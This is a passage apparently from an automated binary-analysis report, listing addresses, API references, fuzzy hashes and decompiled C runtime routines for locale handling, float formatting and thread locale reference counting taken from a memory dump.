                                                                                                              0x00000000
                                                                                                              0x00415347
                                                                                                              0x004152d2
                                                                                                              0x004152d5
                                                                                                              0x004152db
                                                                                                              0x004152de
                                                                                                              0x00415305
                                                                                                              0x00415308
                                                                                                              0x0041530e
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00415310
                                                                                                              0x00415313
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00415315
                                                                                                              0x00415315
                                                                                                              0x0041531b
                                                                                                              0x0041531e
                                                                                                              0x0041528c
                                                                                                              0x0041528c
                                                                                                              0x00415327
                                                                                                              0x00000000
                                                                                                              0x00415327
                                                                                                              0x004152e0
                                                                                                              0x004152e3
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x004152e7
                                                                                                              0x004152f8
                                                                                                              0x004152fe
                                                                                                              0x00415300
                                                                                                              0x00415303
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00415303
                                                                                                              0x004152a0
                                                                                                              0x004152a3
                                                                                                              0x004152a5
                                                                                                              0x004152ab
                                                                                                              0x004152ab
                                                                                                              0x00000000
                                                                                                              0x0041527b
                                                                                                              0x0041527b
                                                                                                              0x00415280
                                                                                                              0x00415284
                                                                                                              0x00415284
                                                                                                              0x00000000
                                                                                                              0x00415280
                                                                                                              0x00415279

                                                                                                              APIs
                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00415293
                                                                                                              • __isleadbyte_l.LIBCMT ref: 004152C7
                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 004152F8
                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 00415366
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                              • String ID:
                                                                                                              • API String ID: 3058430110-0
                                                                                                              • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                              • Instruction ID: 91a149e0a6e05a58f83ecb50570e8582bfb939df11a57d8db06aa35464dead11
                                                                                                              • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                              • Instruction Fuzzy Hash: E531F332A00649EFCB20DFA4C8849EF7BA1FF41350B1885AAE8618B291D334CD80DF58
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 100%
                                                                                                              			E0041349B(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                              				intOrPtr _t25;
                                                                                                              				void* _t26;
                                                                                                              				void* _t28;
                                                                                                              
                                                                                                              				_t25 = _a16;
                                                                                                              				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                              					_t26 = E00412D8C(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                              					goto L9;
                                                                                                              				} else {
                                                                                                              					_t34 = _t25 - 0x66;
                                                                                                              					if(_t25 != 0x66) {
                                                                                                              						__eflags = _t25 - 0x61;
                                                                                                              						if(_t25 == 0x61) {
                                                                                                              							L7:
                                                                                                              							_t26 = E00412E7C(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                              						} else {
                                                                                                              							__eflags = _t25 - 0x41;
                                                                                                              							if(__eflags == 0) {
                                                                                                              								goto L7;
                                                                                                              							} else {
                                                                                                              								_t26 = E004133A1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                              							}
                                                                                                              						}
                                                                                                              						L9:
                                                                                                              						return _t26;
                                                                                                              					} else {
                                                                                                              						return E004132E6(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                                              					}
                                                                                                              				}
                                                                                                              			}






                                                                                                              0x004134a0
                                                                                                              0x004134a6
                                                                                                              0x00413519
                                                                                                              0x00000000
                                                                                                              0x004134ad
                                                                                                              0x004134ad
                                                                                                              0x004134b0
                                                                                                              0x004134cb
                                                                                                              0x004134ce
                                                                                                              0x004134ee
                                                                                                              0x00413500
                                                                                                              0x004134d0
                                                                                                              0x004134d0
                                                                                                              0x004134d3
                                                                                                              0x00000000
                                                                                                              0x004134d5
                                                                                                              0x004134e7
                                                                                                              0x004134e7
                                                                                                              0x004134d3
                                                                                                              0x0041351e
                                                                                                              0x00413522
                                                                                                              0x004134b2
                                                                                                              0x004134ca
                                                                                                              0x004134ca
                                                                                                              0x004134b0

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                              • String ID:
                                                                                                              • API String ID: 3016257755-0
                                                                                                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                              • Instruction ID: c2aaebdd6b1e97fbd04afef3038c10a9fddef8c749c4dc6d406879d47bd1d4cb
                                                                                                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                              • Instruction Fuzzy Hash: B0114E7200014EBBCF225E95CD018EE3F27BF18755B588416FA1899131C73BCAB1AB89
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 95%
                                                                                                              			E00413F9D(void* __eax, void* __ebx, void* __edx) {
                                                                                                              				signed int _t14;
                                                                                                              				LONG* _t20;
                                                                                                              				long _t22;
                                                                                                              				void* _t24;
                                                                                                              				void* _t28;
                                                                                                              				void* _t29;
                                                                                                              				LONG* _t30;
                                                                                                              				void* _t31;
                                                                                                              
                                                                                                              				_t28 = __edx;
                                                                                                              				_t24 = __ebx;
                                                                                                              				_t29 = __eax;
                                                                                                              				_t14 =  *0x422e34; // 0xfffffffe
                                                                                                              				if(( *(__eax + 0x70) & _t14) == 0 ||  *((intOrPtr*)(__eax + 0x6c)) == 0) {
                                                                                                              					E0040D6A0(_t24, 0xd);
                                                                                                              					 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
                                                                                                              					_t30 =  *(_t29 + 0x68);
                                                                                                              					 *(_t31 - 0x1c) = _t30;
                                                                                                              					__eflags = _t30 -  *0x422d38; // 0x2901600
                                                                                                              					if(__eflags != 0) {
                                                                                                              						__eflags = _t30;
                                                                                                              						if(_t30 != 0) {
                                                                                                              							_t22 = InterlockedDecrement(_t30);
                                                                                                              							__eflags = _t22;
                                                                                                              							if(_t22 == 0) {
                                                                                                              								__eflags = _t30 - 0x422910;
                                                                                                              								if(__eflags != 0) {
                                                                                                              									_push(_t30);
                                                                                                              									E0040B675(_t24, _t29, _t30, __eflags);
                                                                                                              								}
                                                                                                              							}
                                                                                                              						}
                                                                                                              						_t20 =  *0x422d38; // 0x2901600
                                                                                                              						 *(_t29 + 0x68) = _t20;
                                                                                                              						_t30 =  *0x422d38; // 0x2901600
                                                                                                              						 *(_t31 - 0x1c) = _t30;
                                                                                                              						InterlockedIncrement(_t30);
                                                                                                              					}
                                                                                                              					 *(_t31 - 4) = 0xfffffffe;
                                                                                                              					E00414027();
                                                                                                              				} else {
                                                                                                              					_t30 =  *(__eax + 0x68);
                                                                                                              				}
                                                                                                              				if(_t30 == 0) {
                                                                                                              					E0040E75A(_t28, _t29, 0x20);
                                                                                                              				}
                                                                                                              				return E0040E1DD(_t30);
                                                                                                              			}











                                                                                                              0x00413f9d
                                                                                                              0x00413f9d
                                                                                                              0x00413f9d
                                                                                                              0x00413f9f
                                                                                                              0x00413fa7
                                                                                                              0x00413fc8
                                                                                                              0x00413fce
                                                                                                              0x00413fd2
                                                                                                              0x00413fd5
                                                                                                              0x00413fd8
                                                                                                              0x00413fde
                                                                                                              0x00413fe0
                                                                                                              0x00413fe2
                                                                                                              0x00413fe5
                                                                                                              0x00413feb
                                                                                                              0x00413fed
                                                                                                              0x00413fef
                                                                                                              0x00413ff5
                                                                                                              0x00413ff7
                                                                                                              0x00413ff8
                                                                                                              0x00413ffd
                                                                                                              0x00413ff5
                                                                                                              0x00413fed
                                                                                                              0x00413ffe
                                                                                                              0x00414003
                                                                                                              0x00414006
                                                                                                              0x0041400c
                                                                                                              0x00414010
                                                                                                              0x00414010
                                                                                                              0x00414016
                                                                                                              0x0041401d
                                                                                                              0x00413faf
                                                                                                              0x00413faf
                                                                                                              0x00413faf
                                                                                                              0x00413fb4
                                                                                                              0x00413fb8
                                                                                                              0x00413fbd
                                                                                                              0x00413fc5

                                                                                                              APIs
                                                                                                              • __amsg_exit.LIBCMT ref: 00413FB8
                                                                                                              • __lock.LIBCMT ref: 00413FC8
                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00413FE5
                                                                                                              • InterlockedIncrement.KERNEL32(02901600), ref: 00414010
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: Interlocked$DecrementIncrement__amsg_exit__lock
                                                                                                              • String ID:
                                                                                                              • API String ID: 2485133824-0
                                                                                                              • Opcode ID: adb4ce2422961a7b06f3ffedef57ff1fdce7c5c2389a78d8f1dfa0396eb9b74e
                                                                                                              • Instruction ID: e61ed66a8314bc7393d4cb68ba787bf960b4b3089ad3da6bdce36f45b7028b55
                                                                                                              • Opcode Fuzzy Hash: adb4ce2422961a7b06f3ffedef57ff1fdce7c5c2389a78d8f1dfa0396eb9b74e
                                                                                                              • Instruction Fuzzy Hash: C9018032E05611ABC7209F26990579AB770AF44B21F44442BE818A7290C77CAA82CBCD
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%